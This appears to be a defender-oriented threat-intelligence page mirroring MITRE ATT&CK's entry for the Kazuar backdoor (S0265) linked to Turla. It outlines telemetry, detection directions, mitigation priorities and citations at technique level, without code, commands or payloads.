S0265: Kazuar
Analyst context for executives and security teams
Kazuar matters because ATT&CK describes it as a fully featured, multi-platform backdoor Trojan for Windows and macOS, with relationships showing discovery, command execution, collection, staging, command-and-control, and exfiltration-related behaviors. For leaders, the practical issue is not only “malware detection,” but whether the organization can prove it would notice a backdoor mapping users, files, processes, network settings, and local permissions before moving data or receiving further tools.
Executive priority
Treat this as a coverage-validation use case for endpoint, network, and incident response readiness across Windows and macOS. Priority questions: do we collect enough host and network evidence to reconstruct discovery and C2 activity; can the SOC distinguish legitimate administration from suspicious WMI, shell, and discovery behavior; and can IR quickly scope local data staging, tool transfer, and potential exfiltration paths? The ATT&CK relationship to Turla increases threat-intelligence relevance, but local exposure and prioritization should be based on observed telemetry and business-critical assets.
Technical view
Kazuar has no official ATT&CK detection text, so defenders should validate coverage through the related techniques rather than rely on a single signature. On Windows, prioritize visibility into .NET process behavior, WMI execution, command shell activity, DLL injection indicators, file deletion, local account/group discovery, process discovery, and file/directory enumeration. On macOS, validate Unix shell execution, user/system/network discovery, file discovery, local data collection, staging, and outbound C2-like traffic. Network teams should review visibility for web protocols, file transfer protocols, fallback channels, internal proxy behavior, bidirectional web-service communication, and ingress tool transfer. IR playbooks should connect host discovery events to possible local data staging and scheduled transfer/exfiltration patterns.
Likely telemetry
- Endpoint process creation and command-line telemetry for Windows and macOS
- Windows WMI activity and administrative execution logs
- DLL/module load, process injection, and suspicious process access telemetry where available
- File creation, modification, staging, and deletion events
- Local account, group, user, process, system, network configuration, file, and directory discovery evidence
Detection direction
- Map detections to the related ATT&CK techniques instead of treating Kazuar as a single malware signature, especially because official detection guidance is not provided.
- Tune for sequences: discovery of users/processes/files/network settings followed by staging, outbound web or file-transfer traffic, tool transfer, or cleanup through file deletion.
- Separate legitimate administration from suspicious use of WMI, Windows command shell, Unix shell, and local account/group discovery by baselining admin hosts, service accounts, timing, and target systems.
- Validate Windows and macOS parity; the object is multi-platform, and endpoint visibility gaps on either platform can create blind spots.
- Correlate host telemetry with network telemetry for web protocols, file transfer protocols, fallback channels, internal proxy behavior, and bidirectional web-service communication.
Mitigation priorities
- Confirm endpoint protection, logging, and response capability on both Windows and macOS assets, especially high-value systems handling sensitive data.
- Reduce abuse of administrative execution paths by controlling and monitoring WMI, command shells, privileged accounts, and local group membership.
- Strengthen egress governance by monitoring and restricting unnecessary web, file-transfer, proxy, and external web-service communication paths.
- Improve data-loss and incident-response readiness by monitoring local data staging locations, unusual scheduled transfers, and outbound transfer patterns.
- Harden investigative retention: preserve endpoint, proxy, DNS, and firewall logs long enough to reconstruct discovery-to-exfiltration timelines.
Analyst notes and limits
ATT&CK records Kazuar as software S0265 and describes it as a fully featured backdoor Trojan written with the Microsoft .NET framework. The relationship set links it to Turla and to techniques spanning execution, discovery, collection, command-and-control, exfiltration, stealth, and privilege-escalation-related behavior. The most useful defensive value is validating whether telemetry can connect these behaviors into an intrusion narrative rather than relying on a named-malware alert.
The supplied ATT&CK object does not provide official detection guidance, aliases, labels, or explicit tactics on the malware object itself. Technique descriptions are relationship context and include platforms broader than Kazuar’s listed Windows and macOS platforms, so defensive planning should not infer Kazuar platform support beyond Windows and macOS from those technique platform lists. Local environment baselines, asset criticality, and observed indicators are required for prioritization and incident conclusions.
Kazuar
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
Groups, software, and campaigns
G0010: Turla
Turla is a cyber espionage threat group that has been attributed to Russia's Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. Turla is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as Uroburos.[1][2][3][4][5]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.4 | Current bundle | bbff460f30d5… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Unit 42 Kazuar May 2017
Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.
Open source URL -
[2]
Kazuar
(Citation: Unit 42 Kazuar May 2017)
-
[3]
mitre-attack S0265Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.